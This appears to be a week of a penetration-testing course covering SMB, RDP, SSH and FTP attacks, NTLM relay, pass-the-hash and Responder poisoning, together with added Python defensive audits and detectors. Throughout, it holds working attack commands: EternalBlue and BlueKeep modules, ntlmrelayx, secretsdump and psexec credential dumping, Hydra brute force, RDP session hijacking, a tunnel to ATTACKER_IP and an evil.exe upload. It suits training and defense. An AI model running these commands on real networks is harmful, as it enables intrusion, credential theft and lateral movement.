
Week 7: Network Penetration Testing

MITRE ATT&CK: Tactic — TA0008 (Lateral Movement), TA0004 (Privilege Escalation), Technique — T1021 (Remote Services)

Real-World Attack Scenario: The Target Network Breach (2013)

The 2013 Target breach is a textbook case of network pen testing failures:

  1. Initial Access via HVAC Vendor: Stolen credentials from Fazio Mechanical Services (HVAC vendor)
  2. Network Reconnaissance: Scanned Target's internal network; found vulnerable SMB on port 445
  3. SMB Exploitation: Used stolen vendor credentials to access SMB shares
  4. Lateral Movement via RDP: Used compromised credentials to access point-of-sale terminals
  5. RAM Scraping: Installed malware on POS terminals to scrape card memory (track data)
  6. Exfiltration: Sent 11GB of payment card data to external server over port 443
  7. Detection Failure: FireEye alerts were ignored; no segmentation stopped the lateral movement

Key network attack techniques used:

  • SMB (ports 445/139) — primary lateral movement vector
  • RDP (port 3389) — POS terminal access
  • DNS — exfiltration tunneling (queries to attacker DNS server encoded card data)
  • Responder/LLMNR poisoning — captured credentials on the internal network

Why this week matters: Target spent millions on perimeter security but had no network segmentation. Once attackers got inside the vendor network, they had access to everything. Network pen testing finds these gaps before attackers do.

Objectives

  • Master network protocol attacks (SMB, FTP, SSH, RDP)
  • Understand relay and capture attacks
  • Perform lateral movement techniques
  • Execute pass-the-hash, token manipulation

SMB Attacks

SMB Anatomy

Port: 445 (direct TCP)
Port: 139 (NetBIOS session)

Versions:
- SMBv1 (CIFS): Ancient, vulnerable to EternalBlue (MS17-010)
- SMBv2: Vista/2008, improved
- SMBv2.1: Windows 7/2008R2
- SMBv3: Windows 8/2012+, encrypted, faster

Default shares:
C$      - C:\ drive (admin only)
ADMIN$  - C:\Windows
IPC$    - Named pipes (null session)

Null Session / Anonymous Access

```bash
# Enumerate with a null (anonymous) session
smbclient -L //10.0.0.5 -N
rpcclient -U "" -N 10.0.0.5
enum4linux -a 10.0.0.5

# In msfconsole (not inside a meterpreter session)
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 10.0.0.5
run
```

SMB Exploits

MS17-010 (EternalBlue)

```bash
# Detect
nmap -p 445 --script=smb-vuln-ms17-010 10.0.0.5

# Exploit with Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.5
set PAYLOAD windows/x64/meterpreter/bind_tcp
run

# Manual exploit (Fergiebix)
# https://github.com/iamongst/EternalBlue-Python
```

SMB Relay (ntlmrelayx)

```bash
# Instead of capturing hashes, relay the authentication to another target
# Requires SMB signing not enforced on the relay target

# Start Responder (poison LLMNR/NBT-NS)
responder -I eth0

# In another terminal, relay to a list of targets
ntlmrelayx.py -tf targets.txt -smb2support

# Or relay to a specific target
ntlmrelayx.py -t 10.0.0.6 -smb2support

# Also serve a WPAD file pointing at this host (-wh is --wpad-host, not a WebDAV hook)
ntlmrelayx.py -tf targets.txt -wh 10.0.0.4 -smb2support
```
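
Before relaying, the precondition to verify (and, for a defender, the thing to remediate) is whether each host enforces SMB signing. The Python below is an added example, not part of the course material: it parses the output of the `nmap --script=smb2-security-mode` scan used in the labs and lists the hosts that would accept a relayed session. The sample scan output is constructed for this example; the three status strings are the ones the NSE script emits.

```python
import re

# Constructed output of `nmap -p 445 --script=smb2-security-mode` for three hosts
# (not a real scan). The three status strings are the ones the NSE script emits.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host is up (0.00041s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.6
Host is up (0.00052s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.7
Host is up (0.00038s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:0:2:
|_    Message signing disabled (dangerous, but default)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
DIALECT_RE = re.compile(r"^\|\s+(\d+:\d+:\d+):", re.M)
SIGNING_RE = re.compile(r"^\|_?\s*Message signing (.+)$", re.M)

def parse_signing(nmap_output):
    """Map each scanned host to its SMB2 dialect, signing status and whether an
    NTLM relay against it would be accepted (signing not enforced)."""
    results = {}
    chunks = HOST_RE.split(nmap_output)   # [preamble, host1, body1, host2, body2, ...]
    for host, body in zip(chunks[1::2], chunks[2::2]):
        status = SIGNING_RE.search(body)
        dialect = DIALECT_RE.search(body)
        if status is None:
            results[host] = {"dialect": None, "status": "no SMB2 security mode reported",
                             "relay_target": None}
            continue
        text = status.group(1).strip()
        results[host] = {
            "dialect": dialect.group(1) if dialect else None,
            "status": text,
            # only "enabled and required" rejects an unsigned (relayed) session
            "relay_target": "and required" not in text,
        }
    return results

def relayable_hosts(results):
    """Hosts a defender needs to fix: signing enabled-but-optional or disabled."""
    return sorted(h for h, r in results.items() if r["relay_target"])
```

Feed it real output with `parse_signing(open("scan.txt").read())`. Hosts returned by `relayable_hosts` are the ones to fix with the "Microsoft network server: Digitally sign communications (always)" policy; rerun the scan afterwards to confirm every host reports "enabled and required".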

impacket Toolkit

```bash
# GetNPUsers - AS-REP Roasting (accounts with Kerberos pre-authentication disabled)
python3 GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt
hashcat -m 18200 hashes.txt wordlist.txt

# GetADUsers
python3 GetADUsers.py -all DOMAIN/username:password

# GetUserSPNs - Kerberoasting (-request actually pulls the service tickets)
python3 GetUserSPNs.py DOMAIN/username:password -request -outputfile spn_hashes.txt

# secretsdump - Dumping NTDS.dit
python3 secretsdump.py DOMAIN/username:password@10.0.0.5

# smbexec - Execute commands via SMB
python3 smbexec.py DOMAIN/username:password@10.0.0.5

# wmiexec - Execute via WMI
python3 wmiexec.py DOMAIN/username:password@10.0.0.5

# psexec - PsExec via SMB (needs the ADMIN$ share)
python3 psexec.py DOMAIN/username:password@10.0.0.5

# lookupsid - Enumerate SIDs
python3 lookupsid.py DOMAIN/username:password@10.0.0.5
```
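
The two Kerberos attacks above depend on account attributes a defender can audit directly: AS-REP roasting needs DONT_REQ_PREAUTH set in userAccountControl, Kerberoasting needs an enabled user account with a servicePrincipalName. The Python audit below is an added example, not an impacket tool or course code: the account records are constructed to stand in for an LDAP export, and the bit values are the documented userAccountControl flags.

```python
# userAccountControl bit flags (documented AD attribute values) relevant to Kerberos exposure
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
}
DISABLED, DONT_EXPIRE, DONT_REQ_PREAUTH = 0x0002, 0x10000, 0x400000

# Constructed stand-in for an LDAP export of user objects (not a real directory)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "jdoe",       "userAccountControl": 0x200,    "servicePrincipalName": []},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x400200, "servicePrincipalName": []},
    {"sAMAccountName": "svc_sql",    "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "old_vendor", "userAccountControl": 0x400202, "servicePrincipalName": []},
    {"sAMAccountName": "krbtgt",     "userAccountControl": 0x202,    "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "WS01$",      "userAccountControl": 0x1000,   "servicePrincipalName": ["HOST/ws01.corp.local"]},
]

def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def asrep_roastable(acct):
    """Enabled account with pre-authentication disabled: the KDC returns an AS-REP
    encrypted under the user's key to anyone who asks (what GetNPUsers.py collects)."""
    uac = acct["userAccountControl"]
    return bool(uac & DONT_REQ_PREAUTH) and not uac & DISABLED

def kerberoastable(acct):
    """Enabled user (not computer, not krbtgt) account with an SPN: any domain user can
    request a service ticket encrypted under its password-derived key (GetUserSPNs.py)."""
    uac, name = acct["userAccountControl"], acct["sAMAccountName"]
    if uac & DISABLED or name.endswith("$") or name.lower() == "krbtgt":
        return False
    return bool(acct["servicePrincipalName"])

def audit(accounts):
    findings = []
    for acct in accounts:
        issues = []
        if asrep_roastable(acct):
            issues.append("AS-REP roastable: DONT_REQ_PREAUTH set (GetNPUsers.py target)")
        if kerberoastable(acct):
            issues.append("Kerberoastable: user account with SPN (GetUserSPNs.py target)")
        if issues and acct["userAccountControl"] & DONT_EXPIRE:
            issues.append("password never expires, so a cracked hash stays valid")
        if issues:
            findings.append({"account": acct["sAMAccountName"],
                             "flags": decode_uac(acct["userAccountControl"]),
                             "issues": issues})
    return findings
```

Clearing DONT_REQ_PREAUTH closes the AS-REP case outright; for service accounts with SPNs the fix is a long random password (or a group Managed Service Account), which is why the audit also reports DONT_EXPIRE_PASSWORD on the accounts it flags.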

Pass-the-Hash

Why it Works

Windows network authentication with NTLM proves possession of the password's NT hash, not the password itself. If you have the hash, you can authenticate without ever knowing the password. It works wherever NTLM authentication is accepted.
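
The claim that the hash alone is enough can be shown directly. The Python below is an added example, not course code: it derives the NT hash (MD4 over the UTF-16LE password, which is what `hashdump` prints) and then computes an NTLMv2 challenge response as specified in MS-NLMP, a function whose only secret input is that hash. The password, server challenge and client blob are constructed values (the blob is a minimal stand-in for the real NTLMv2_CLIENT_CHALLENGE structure), and MD4 is written out because many hashlib builds no longer ship it.

```python
import hmac
import hashlib
import struct

def _rotl(v, s):
    return ((v << s) | (v >> (32 - s))) & 0xFFFFFFFF

def md4(data):
    """MD4 (RFC 1320), written out because OpenSSL 3 builds of hashlib often omit it."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                            # round 1
            a = _rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)):
            a = _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c                                    # round 2
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):
            a = _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c                                    # round 3
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password):
    """NT hash = MD4 of the UTF-16LE password. This is the value hashdump prints."""
    return md4(password.encode("utf-16-le"))

def ntlmv2_response(nt, user, domain, server_challenge, client_blob):
    """NTLMv2 response per MS-NLMP. Note the signature: it takes the NT hash and never
    the password, which is the whole reason pass-the-hash works."""
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    nt_proof = hmac.new(ntowf_v2, server_challenge + client_blob, hashlib.md5).digest()
    return nt_proof + client_blob

# LM hash of an empty password: the constant the page's LM:NT strings start with
EMPTY_LM = bytes.fromhex("aad3b435b51404eeaad3b435b51404ee")

def demo():
    """Constructed scenario: a dumped LM:NT string is enough to reproduce the
    NTLMv2 response that the legitimate client would send."""
    password = "Winter2024!"                                        # constructed
    server_challenge = bytes.fromhex("0123456789abcdef")            # constructed
    client_blob = bytes.fromhex("0101000000000000" + "00" * 24)     # constructed, simplified blob
    legit = ntlmv2_response(nt_hash(password), "Administrator", "WS05", server_challenge, client_blob)
    dumped = EMPTY_LM.hex() + ":" + nt_hash(password).hex()         # hashdump-style LM:NT
    replayed = ntlmv2_response(bytes.fromhex(dumped.split(":")[1]), "Administrator", "WS05",
                               server_challenge, client_blob)
    return dumped, legit == replayed
```

The server verifies the response by running the same computation over the NT hash it stores, so it cannot tell a client that knows the password from one that only knows the hash. That is why the defensive takeaway is about hash hygiene (limiting where privileged hashes are cached, restricting NTLM) rather than password complexity.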

Tools

```bash
# Metasploit
# After getting a Meterpreter shell
use post/windows/manage/hash_migrate

# Pass the hash directly
use exploit/windows/smb/psexec
set RHOSTS 10.0.0.5
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:5f8c3b8c3e8c3...  # LM:NTLM format
# or using just the NT hash
set SMBPass 5f8c3b8c3e8c3...:5f8c3b8c3e8c3...
run

# CrackMapExec (NetExec)
# Pass-the-hash
cme smb 10.0.0.5 -u administrator -H "aad3b435b51404eeaad3b435b51404ee:5f8c3b8c3e8c3..."

# Execute command
cme smb 10.0.0.5 -u administrator -H "hash" -x "whoami"

# Pass-the-ticket (Kerberos)
# Extract ticket from memory
# Use ticket on another system
```

RDP Attacks

Basic Enum & Exploits

```bash
# Port 3389
nmap -sV -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 10.0.0.5

# BlueKeep (CVE-2019-0708): rdp-vuln-ms12-020 tests a different bug, use the Metasploit scanner
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS 10.0.0.5
run
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
```

Brute Force & Session Hijacking

```bash
# Hydra brute force
hydra -l administrator -P passwords.txt rdp://10.0.0.5

# Crowbar
crowbar -b rdp -s 10.0.0.5/32 -u administrator -C passwords.txt

# Session hijacking (must be local admin)
# Get session IDs
query user
# Connect session 3 to your own session (rdp-tcp#6)
tscon 3 /dest:rdp-tcp#6
```

RDP Tunneling

```bash
# Through compromised host
# Local port forward
plink -L 3389:127.0.0.1:3389 user@10.0.0.5

# Remote port forward (from compromised)
plink -R 3389:127.0.0.1:3389 user@10.0.0.6
```

SSH Attacks

Basic Enum

```bash
# Banner grab
nc -nv 10.0.0.5 22
ssh -v 10.0.0.5

# Enum ciphers
nmap -p 22 --script=ssh2-enum-algos 10.0.0.5
ssh-audit 10.0.0.5
```

Brute Force

```bash
# Hydra
hydra -l root -P wordlist.txt ssh://10.0.0.5

# Medusa
medusa -h 10.0.0.5 -u root -P wordlist.txt -M ssh

# With SSH key
ssh -i key.pem user@10.0.0.5

# Metasploit
use auxiliary/scanner/ssh/ssh_login
```
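
The Hydra and Medusa runs above leave a very recognisable trail in `auth.log`. The Python below is an added example, not course code: it parses constructed sshd log lines, raises an alert when one source exceeds a failure threshold inside a sliding time window, and escalates the alert when that same source then gets an `Accepted` logon shortly afterwards. The log lines, thresholds and the year used for timestamp parsing are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt (not a real host's log): a password-guessing burst
# from 10.0.0.9 that ends in a successful root logon, and one honest typo from 10.0.0.20.
SAMPLE_AUTH_LOG = """\
Mar 14 10:02:01 host sshd[2210]: Failed password for root from 10.0.0.9 port 51234 ssh2
Mar 14 10:02:02 host sshd[2211]: Failed password for invalid user admin from 10.0.0.9 port 51235 ssh2
Mar 14 10:02:03 host sshd[2212]: Invalid user oracle from 10.0.0.9 port 51236
Mar 14 10:02:03 host sshd[2213]: Failed password for root from 10.0.0.9 port 51237 ssh2
Mar 14 10:02:04 host sshd[2214]: Failed password for root from 10.0.0.9 port 51238 ssh2
Mar 14 10:02:05 host sshd[2215]: Failed password for root from 10.0.0.9 port 51239 ssh2
Mar 14 10:02:30 host sshd[2220]: Accepted password for root from 10.0.0.9 port 51240 ssh2
Mar 14 10:15:00 host sshd[2301]: Failed password for jdoe from 10.0.0.20 port 40000 ssh2
Mar 14 10:15:20 host sshd[2302]: Accepted publickey for jdoe from 10.0.0.20 port 40001 ssh2: RSA SHA256:constructed
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<msg>.*)$")
FAIL_RE = re.compile(r"^(?:Failed password for|Invalid user) .*?from (?P<ip>\d+\.\d+\.\d+\.\d+)")
OK_RE = re.compile(r"^Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)")

def parse_ts(ts, year=2024):
    # syslog timestamps carry no year; one is assumed here for the constructed sample
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text, threshold=5, window_s=60, success_grace_s=600):
    """Return {ip: alert} for sources with >= threshold failures inside window_s seconds.
    If that source then logs an Accepted within success_grace_s, the alert records it."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    totals = Counter()            # ip -> all failures seen, for the report
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, msg = parse_ts(m["ts"]), m["msg"]
        f = FAIL_RE.match(msg)
        if f:
            ip = f["ip"]
            totals[ip] += 1
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # slide the window
                q.popleft()
            if ip in alerts:
                alerts[ip]["burst_end"] = ts
            elif len(q) >= threshold:
                alerts[ip] = {"first_fail": q[0], "burst_end": ts, "success": None}
            continue
        s = OK_RE.match(msg)
        if s and s["ip"] in alerts:
            a = alerts[s["ip"]]
            if (ts - a["burst_end"]).total_seconds() <= success_grace_s:
                a["success"] = {"user": s["user"], "method": s["method"], "at": ts}
    for ip, a in alerts.items():
        a["fail_count"] = totals[ip]
    return alerts
```

The single failure from 10.0.0.20 never reaches the threshold, so it produces nothing; the burst from 10.0.0.9 alerts at the fifth failure and is escalated when the `Accepted password` line arrives 25 seconds later. A guess-then-success sequence like that is the one to page on, and it is also the case that fail2ban-style blocking alone would have missed if the threshold was set higher than the attacker's list.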

SSH Tunnels & Port Forwarding

```bash
# Local port forward (attacker machine)
# Access remote service via compromised host
ssh -L 4444:127.0.0.1:3306 user@10.0.0.5
# Now connect to localhost:4444 → goes through 10.0.0.5 to its localhost:3306

# Dynamic port forward (SOCKS proxy)
ssh -D 1080 user@10.0.0.5
# Configure browser to use 127.0.0.1:1080 as SOCKS proxy

# Remote port forward (from compromised)
# From 10.0.0.5, forward its port 80 to your local 8080
ssh -R 8080:127.0.0.1:80 user@ATTACKER_IP

# Proxy chains
# /etc/proxychains4.conf: add `socks5 127.0.0.1 1080` to match the -D port above
proxychains nmap -sT -p 445 10.0.0.6
```

FTP Attacks

Basic Attacks

```bash
# Anonymous login
ftp 10.0.0.5
# user: anonymous
# pass: anonymous

# Banner grab
nc -nv 10.0.0.5 21

# Version detection
nmap -sV -p 21 10.0.0.5

# Common exploits
# VSFTPD 2.3.4 backdoor (CVE-2011-2523)
# ProFTPD 1.3.3c (mod_copy)
```

File Transfer on Compromised System

```bash
# Download files
smbclient //10.0.0.5/share -U user -W DOMAIN
# or
psexec.py DOMAIN/user:pass@10.0.0.5 "cmd /c type file.txt"

# Upload files
# Via SMB, from a Windows host (UNC path; the bash `cp` form does not work)
copy evil.exe \\10.0.0.5\ADMIN$\evil.exe
# or, from Linux
smbclient //10.0.0.5/C$ -U admin
# smb: \> put evil.exe

# Via FTP: run an FTP server on the attacker box (10.0.0.4), then
# from target: ftp 10.0.0.4
#              get malicious.exe
```

Lateral Movement Summary

| Technique     | Port      | Tool                  | Requirement              |
|---------------|-----------|-----------------------|--------------------------|
| SMB Psexec    | 445       | impacket, Metasploit  | Admin share, credentials |
| WMI           | 135, 445  | wmiexec, CrackMapExec | Admin, WinRM             |
| RDP           | 3389      | xfreerdp, rdesktop    | User creds               |
| SSH           | 22        | ssh, plink            | Valid credentials        |
| WinRM         | 5985/5986 | evil-winrm            | Admin creds              |
| Pass-the-Hash | 445       | Mimikatz, CME         | NT hash                  |

Responder / LLMNR/NBT-NS Poisoning

Theory

When a DNS lookup fails, Windows falls back to broadcasting LLMNR and NBT-NS queries for the name. An attacker on the same segment answers those queries, the victim authenticates to the attacker, and the attacker captures the NTLMv2 challenge-response (the "hash" Responder prints). That capture is then either cracked offline or relayed to another host.

Execution

```bash
# Edit Responder.conf first. To capture hashes for cracking, leave SMB = On and
# HTTP = On. To relay with ntlmrelayx, set SMB = Off and HTTP = Off, otherwise
# Responder holds ports 445/80 and the relay never sees the authentication.

# Start Responder
responder -I eth0 -dwv

# Wait for victim traffic
# Or force authentication
# Run on a network segment with LLMNR/NBT-NS enabled

# In another terminal, relay
ntlmrelayx.py -tf targets.txt -smb2support
```
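
Both the relay section and this one begin with Responder answering name queries it has no business answering, and that behaviour is exactly what a defender can watch for. The Python below is an added example, not course code: it reads constructed records of LLMNR/NBT-NS responses seen on a segment and flags any responder that answers a canary name, answers for many distinct names, or answers for names that are not its own. The canary name and the host inventory are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed log of LLMNR/NBT-NS *responses* seen on the segment, in the shape a small
# sniffer or Zeek script might emit (not real traffic). A legitimate host only ever
# answers for its own name; a poisoner answers for anything it hears.
SAMPLE_RESPONSES = """\
10:01:02 LLMNR  name=WS20                    from=10.0.0.20
10:01:07 NBT-NS name=PRINTER01               from=10.0.0.30
10:02:11 LLMNR  name=FILESRV                 from=10.0.0.4
10:02:12 LLMNR  name=FILESVR                 from=10.0.0.4
10:02:40 LLMNR  name=WPAD                    from=10.0.0.4
10:03:05 LLMNR  name=CANARY-DO-NOT-RESOLVE   from=10.0.0.4
10:03:09 NBT-NS name=WS21                    from=10.0.0.21
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<proto>LLMNR|NBT-NS)\s+name=(?P<name>\S+)\s+from=(?P<ip>\S+)")

# Assumption: the defender periodically broadcasts a query for a name that exists
# nowhere; any answer to it is forged by definition.
CANARY_NAMES = {"CANARY-DO-NOT-RESOLVE"}
# Assumption: asset inventory mapping IP -> the one name that host may answer for
HOST_INVENTORY = {"10.0.0.20": "WS20", "10.0.0.21": "WS21", "10.0.0.30": "PRINTER01"}

def parse_responses(text):
    """Parse the response log into dicts with ts/proto/name/ip; skip malformed lines."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows

def find_poisoners(rows, distinct_threshold=3):
    """Return {responder_ip: {"names": [...], "reasons": [...]}} for suspicious responders."""
    names_by_ip = defaultdict(set)
    for r in rows:
        names_by_ip[r["ip"]].add(r["name"].upper())
    alerts = {}
    for ip, names in names_by_ip.items():
        reasons = []
        if names & CANARY_NAMES:
            reasons.append("answered the canary name")
        if len(names) >= distinct_threshold:
            reasons.append(f"answered for {len(names)} distinct names")
        own = (HOST_INVENTORY.get(ip) or "").upper()
        foreign = sorted(n for n in names if n != own)
        if not own and foreign:
            reasons.append("not in inventory yet answering name queries")
        elif foreign:
            reasons.append("answered for names that are not its own: " + ", ".join(foreign))
        if reasons:
            alerts[ip] = {"names": sorted(names), "reasons": reasons}
    return alerts
```

The canary is the cheapest and most reliable of the three signals: nothing legitimate can answer a name that does not exist, so even a poisoner that answers only one query is caught. The distinct-name and not-its-own checks catch the same behaviour without a canary, at the cost of needing an inventory to avoid flagging multi-homed hosts. Disabling LLMNR and NBT-NS by policy removes the attack surface entirely.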

Practice Labs

Lab 1: SMB Relay Attack

```bash
# Setup: 2 VMs - Attacker (Kali), Victim (Win7)
# Victim must have SMB signing disabled

# From Kali, confirm the relay target does not require SMB signing
# (the relay is rejected if it does)
nmap -p 445 --script=smb2-security-mode 10.0.0.6

# Start Responder
responder -I eth0

# Wait for victim to authenticate or force it
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t 10.0.0.6 -smb2support
```

Lab 2: Pass-the-Hash with Mimikatz

```bash
# Get a meterpreter shell on Windows
# Load mimikatz (load kiwi is the maintained replacement for the mimikatz extension)
load mimikatz

# Extract hashes
hashdump
# or in meterpreter
run post/windows/gather/hashdump

# Pass the hash
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass <NTLM_HASH>
```

Lab 3: Lateral Movement Chain

```bash
# Start with low-level access to 10.0.0.5 (Linux)
# Enumerate (--sam dumps local hashes and needs local admin on 10.0.0.6)
netexec smb 10.0.0.6 -u user -p pass --sam
netexec smb 10.0.0.6 -u user -p pass -x "whoami"

# Pass the hash to the Windows domain controller
netexec smb 10.0.0.7 -u administrator -H "hash" -x "whoami"
```

Key Takeaways

  1. SMB signing — enable to prevent relay attacks
  2. NTLM relay — capture and relay hashes between machines
  3. Pass-the-hash — use hash without cracking; authenticate directly
  4. SSH tunnels — pivot through compromised hosts
  5. Lateral tools — impacket, CrackMapExec/NetExec, Metasploit
  6. Defense — enable SMB signing, NTLM relay protections, strong passwords

Next Week Preview

Week 8 covers Wireless Security — WPA2 handshake capture, KRACK, Evil Twin attacks, and RF fundamentals for security testing.
